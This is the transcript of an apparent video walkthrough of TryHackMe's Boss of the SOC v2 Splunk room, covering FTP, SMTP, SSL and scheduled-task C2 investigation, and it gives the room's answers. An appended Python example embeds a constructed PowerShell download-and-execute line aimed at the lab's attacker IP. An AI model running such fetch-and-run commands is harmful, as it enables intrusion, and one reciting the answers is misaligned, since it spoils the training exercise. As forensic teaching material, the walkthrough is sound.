Investigating FTP with Splunk | TryHackMe Boss of the SOC v2

Video Statistics and Information

Captions
So, I'm back here again, and today we're doing the last task of Splunk. The last task includes the 400-series questions and is considered one of the easiest tasks you will ever encounter, except for the last question. Basically, this scenario is about investigating FTP traffic, so let's get started.

The first question: a federal law enforcement agency reports that Taedonggang often spearphishes its victims with zip files that have to be opened with a password. What is the name of the attachment sent to Frothly by a malicious Taedonggang actor? Here the question highlights spear phishing, zip files and a password, which means we have to look first in the email traffic, or SMTP traffic, along with zip files. To construct a query, I have just typed a query here, and then we go to Splunk, highlighting the data sets: source type smtp for emails and *.zip for zip files. We click on search and the number of events returned is six. If we scroll down, or if we just pipe this to reverse to display the events in the very first order so the oldest events appear first, and take a look at the first one, there is no mention of the attachment, sender or receiver. Scrolling down, we see the sender, Jim Smith, and let's take a look at the subject; the subject would give us some hint about the content of the email. The subject is "invoice", so there's a good chance that the attachment here is an invoice. If you click on "show as raw text", in the first line we have an attachment; the attachment file name is invoice.zip, which is the answer for the first question.

Now, what is the password to open the zip file? Finding the password is not so difficult: if the zip file was actually encrypted, then the password should be in the content of the email, as the sender would have notified the receiver that the password is such-and-such, right? So if you look at the content of the email, starting after Content-Type and all the way down: "As we haven't received a cessation letter, I'm assuming that you might have accidentally overlooked this invoice. Should you wish to bring an end to the agreement, please let us know; otherwise early withdrawal penalties will apply next month. Please enter the password for the zip file," and the password is all numbers.

Next one: the Taedonggang APT group encrypts most of their traffic with SSL. What is the SSL issuer that they use for the majority of their traffic? Answer guidance: copy the field exactly, including spaces. There is a mention of SSL here, so we would look for HTTP traffic and then filter to look for HTTPS, but the question is highlighting SSL in general, so we would assume that the Taedonggang APT group uses SSL in all of their traffic, which means we have to look at TCP traffic. Let me copy the command. Scrolling up: source type tcp, because we would like to look at all of the TCP traffic to find out the SSL used in the events, and here the IP address is taken from previous questions. Basically, we are looking for those who attacked the brewertalk website. If you scroll up, the hint for the question says you'll need the attacker's IP address; remember there was an IP address scanning brewertalk. So if you have completed the previous tasks, go to task 200 (task two) and remember that the IP address was 45.77.65.211. We use the IP address in the query to look for TCP traffic including the IP address of the attacker, and we click on search. Since we're looking for SSL traffic, we look at the interesting fields, and in the existing fields we see fields related to SSL. In the question we are interested in finding the SSL issuer, so let's see if the SSL issuer is listed in the interesting fields. We see there is a field called ssl_issuer; we click on that and we have only one value, which is C=US, which is the answer for the question.

All right: what unusual file (for an American company) does winsys32.dll cause to be downloaded into the Frothly environment? As you can see, the answer is in Chinese characters, maybe Korean; I'm not aware of these languages. But "what unusual file for an American company": the hint here is that the file should be in a language that is unusual for an American company, which means the file name is not in English. That's the first hint to answer the question. The second hint is that winsys32.dll causes it to be downloaded into the Frothly environment. Now, if you take this and google it to see what it is, let's take a look at the description from file.net: it's a backdoor trojan file that connects to a remote IRC server and waits for commands from the remote user; it activates an IRC client which provides the remote hacker access to your system. As you can see, the description here is saying it's not essential for Windows, so most probably this is a kind of DLL trojan. But here we're looking at the executable file; we want to see the DLL file, if there's a description available for it. Let's see: Microsoft here, there's a blue screen, I think this scenario is irrelevant. The description of the executable version of it is a vector, and the snippet is by file.net, so there is no consensus on the nature of this DLL file. That's why we look at the hints. If you go to question number four, the next task: find an unusual file that was downloaded with winsys32.dll. The hint here is saying that you have to investigate FTP traffic, and I know that a file could be downloaded several ways; one of them is FTP, other ways could be HTTP, but in the question we'll look at the FTP traffic. Let me grab the command and I will explain the parts of it. So we look at the source or data set: the source type is ftp, since a download operation is involved, and the method is RETR.

But before putting the method here, and before putting reverse, let's first search with the source type as ftp and see what number of events will be returned. We have 1,490 events, which is too much to go through; that's why we have to look at the interesting fields. In the interesting fields we see two important ones: one is method and the other is method_parameter. For method we have nine methods, and for downloading files over FTP the method used is RETR. We click on that and the number of events returned is 14, which is good; it means we are going in the right direction. 14 events is not that difficult to go through and filter down to the answer. Pipe that to reverse to display the oldest first, so we construct the timeline of the events, oldest to newest. Here we see "connected", "file transferred", "all files successfully transferred"; here we see the file has been fully downloaded, "file successfully transferred", so potentially the file has been downloaded in this event. Through "show as raw text", let's see here; next one. We can see that the names of the files being downloaded are listed under method_parameter, so what we can do is reconstruct the query and pipe it to table method, method_parameter to see what file names have been downloaded: "dns nc". It's pretty much obvious that the unusual file name for an American company is this one, so this is the file that has been downloaded and is at the same time unusual for an American company.

All right: what is the first and last name of the poor innocent sap who was implicated in the metadata of the file that executed PowerShell Empire on the first victim's workstation? Technically there was a file that executed the PowerShell command on the target system, and this file has the name of a guy in its metadata. So we have to take a look at the malware itself and see its metadata. We don't have access to the malware; that's why the owner of the room has uploaded the malware to various malware analysis platforms, and from that we will extract the answer. If we go to VirusTotal, here are the results of the scan on the malware itself. If you go to the details, you see the details and other metadata of the file. Here, under "last saved by", we have Ryan Kovar. That's the only name mentioned in the metadata, which is the answer to that question.

Within the document, what kind of points are mentioned if you found the text? "Within the document", so we have to open the document itself to answer that question; that's why we'll go to ANY.RUN. These links are provided by the owner of the room; you can click on them directly and open it up. See here: the file was opened, and inside the file, you see in this screenshot: "Congrats, it looks like you have a VirusTotal account and choose to live on the edge. If you find this, turn it in for some CyberEastEgg points." So the kind of points in the file: CyberEastEgg.

The last one, which is the most difficult: to maintain persistence in the Frothly network, Taedonggang APT configured several scheduled tasks to beacon back to their C2 server. What single web page is most contacted by the scheduled tasks? Answer guidance: a simple answer, for example "index" or "images". The first thing to notice from the question is the presence of scheduled tasks, so the attackers probably created or used the scheduled task executable. The first step in finding the answer is including the "scheduled task" keyword in the query in Splunk. Let me grab this first and go to Splunk. We include "scheduled task" in the query and take a look at the number of events involving the scheduled tasks: we have 103 events, which is also not practical to go through one by one; that's why we have to use the interesting fields.

Among the interesting fields we can use is the source type: we have Sysmon and we have the event log, and since we were just talking about scheduled tasks and beaconing activity, these kinds of events are logged by Sysmon (System Monitor). If you change the source type to Sysmon, or include it in the search query, the number of events is narrowed down significantly to 67 events, but we still have some work to do. Let's take a look at the interesting fields. Since we're looking at scheduled tasks, most probably there is a command being executed to communicate with the C2 servers. We have the parent process: as you can see, one is PowerShell. We also have the parent command line: as you can see, we have PowerShell commands. So if we click on one of them, or if we table it, let's use the parent command line: table ParentCommandLine, CommandLine, since we'd like to show the command line and the parent process of the command line. In the parent command line we have a PowerShell command; on the right, the command line is, as you can see, the scheduled task. So there is a scheduled task that is running PowerShell on a registry key, which is SOFTWARE\Microsoft\Network\debug. How is that relevant to our question? Let's get back to the question: to maintain persistence in the Frothly network, Taedonggang APT configured several scheduled tasks to beacon back to the C2 server; what single web page is most contacted by the scheduled tasks? Arriving at the original command that is executing PowerShell, you see it is related to the registry: there is something being executed on the registry key SOFTWARE\Microsoft\Network\debug. Now, if we find out what the registry keys and their corresponding values are under this registry path, most likely we would end up with the exact values of the web pages being contacted. That's why we switch to a new command.

The new command is this one: the source type is WinRegistry, as we would like to examine the Windows registry, and the keyword is SOFTWARE\Microsoft\Network, which is the path we take from here. Now let me cancel two here, so one escape only. The number of events returned is four. Now we examine them one by one; let's say reverse, oldest to newest. First one: to extract the values of the keys we have to take a look at the data. The data is a base64-encoded string, so we can just take it and decode it with CyberChef. Copy and paste it; you will see the characters here, but this is not the one that contains the answer. If you scroll down and click on "show all lines", this one: if you copy this and paste it here, you will see that in this one we have https, the IP address of the attacker, 443 (using HTTPS), and then /login/process.php, with data= and the download data. So most likely this is the URL being visited by the scheduled task to communicate with the C2 server. This is the URL, and as you can see, /login/process.php: process.php is the PHP file being communicated with by the attackers, so this is the answer for this question.

And finally the room is finished. You can find the answers and explanations for the previous tasks in my previous videos. In the next videos I'm going to dominate the machine. Now let's take a look at the Cyber Defense pathway and see where we are at the moment. We finished everything in Threat and Vulnerability Management except this one; this room is not ready yet. Let's take a look at Security Operations and Monitoring, the SOC rooms: as you can see, we have finished all of the rooms in this SOC section; these rooms are not finished yet and are in the pipeline, so once they are finished we will provide the walkthrough for them. Incident Response and Forensics: in the next videos we will tackle forensics and incident response, starting from Autopsy and disk analysis with Autopsy. So that was for today, I hope you liked it, and see you in the next video.
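The three pivots in the walkthrough above (filter FTP events to the RETR method and table the file names, flag the file name that is not ASCII, then base64-decode the WinRegistry data values and count which web page the scheduled-task beacons contact) as an added Python example; this is not code from the video, from TryHackMe or from Splunk. The events are constructed to mimic the Splunk field names used in the walkthrough (sourcetype, method, method_parameter, data). The file names, the PowerShell text inside the blobs and the second page (news.php) are made up; the attacker IP 45.77.65.211 and the /login/process.php path are the ones the walkthrough names. The decoder handles both UTF-8 and UTF-16LE values, because PowerShell encoded commands are UTF-16LE and decoding those as UTF-8 yields junk.

```python
import base64
import re
from collections import Counter
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")


def b64(text: str, utf16: bool = False) -> str:
    """Encode constructed sample data the way it would sit in a registry value:
    UTF-16LE (what PowerShell -EncodedCommand uses) or plain UTF-8."""
    raw = text.encode("utf-16-le") if utf16 else text.encode("utf-8")
    return base64.b64encode(raw).decode("ascii")


# Constructed events shaped like the Splunk fields the walkthrough tables
# (sourcetype, method, method_parameter). Not real BOTS v2 data.
FTP_EVENTS = [
    {"sourcetype": "stream:ftp", "method": "USER", "method_parameter": "ftpuser"},
    {"sourcetype": "stream:ftp", "method": "CWD", "method_parameter": "/pub"},
    {"sourcetype": "stream:ftp", "method": "RETR", "method_parameter": "invoice.zip"},
    {"sourcetype": "stream:ftp", "method": "STOR", "method_parameter": "report.docx"},
    {"sourcetype": "stream:ftp", "method": "RETR", "method_parameter": "문서.hwp"},  # constructed non-ASCII name
    {"sourcetype": "stream:ftp", "method": "RETR", "method_parameter": "update.exe"},
]

# Constructed WinRegistry events: base64 "data" under the key path the
# walkthrough found. The IP and /login/process.php come from the walkthrough;
# the surrounding PowerShell text and news.php are made up.
KEY = r"HKLM\SOFTWARE\Microsoft\Network\debug"
REGISTRY_EVENTS = [
    {"sourcetype": "WinRegistry", "key_path": KEY,
     "data": b64("$u='https://45.77.65.211:443/login/process.php?data=1';"
                 "IEX (New-Object Net.WebClient).DownloadString($u)")},
    {"sourcetype": "WinRegistry", "key_path": KEY,
     "data": b64("$u='https://45.77.65.211:443/news.php';Start-Sleep 60", utf16=True)},
    {"sourcetype": "WinRegistry", "key_path": KEY,
     "data": b64("$u='https://45.77.65.211:443/login/process.php?data=2';Start-Sleep 60",
                 utf16=True)},
]


def ftp_downloads(events):
    """Same filter as method=RETR | table method_parameter in the walkthrough."""
    return [e["method_parameter"] for e in events if e.get("method") == "RETR"]


def non_ascii_names(names):
    """File names an American company would not normally exchange: anything
    outside ASCII (Korean, Chinese, Cyrillic, ...)."""
    return [n for n in names if not n.isascii()]


def decode_blob(b64_data: str) -> str:
    """Decode one registry data value. Interleaved NUL bytes mean UTF-16LE
    (PowerShell encoded commands); decoding those as UTF-8 gives junk."""
    raw = base64.b64decode(b64_data)
    if b"\x00" in raw:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def page_counts(registry_events):
    """Count the last path component of every URL found in the decoded values,
    ignoring the query string (?data=...)."""
    counts = Counter()
    for ev in registry_events:
        for url in URL_RE.findall(decode_blob(ev["data"])):
            counts[urlparse(url).path.rsplit("/", 1)[-1]] += 1
    return counts


def most_contacted_page(registry_events) -> str:
    page, _ = page_counts(registry_events).most_common(1)[0]
    return page


if __name__ == "__main__":
    downloads = ftp_downloads(FTP_EVENTS)
    print("RETR downloads:", downloads)
    print("non-ASCII names:", non_ascii_names(downloads))
    print("pages by scheduled-task beacons:", dict(page_counts(REGISTRY_EVENTS)))
    print("most contacted page:", most_contacted_page(REGISTRY_EVENTS))
```

Counting by path component rather than by full URL is what makes the question answerable: each beacon carries a different data= value, so the raw URLs never repeat, but the page they hit does.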
Info
Channel: Motasem Hamdan
Views: 9,180
Keywords: splunk, cybersecurity
Id: QlUq9TaM_fM
Length: 21min 30sec (1290 seconds)
Published: Sun Jun 20 2021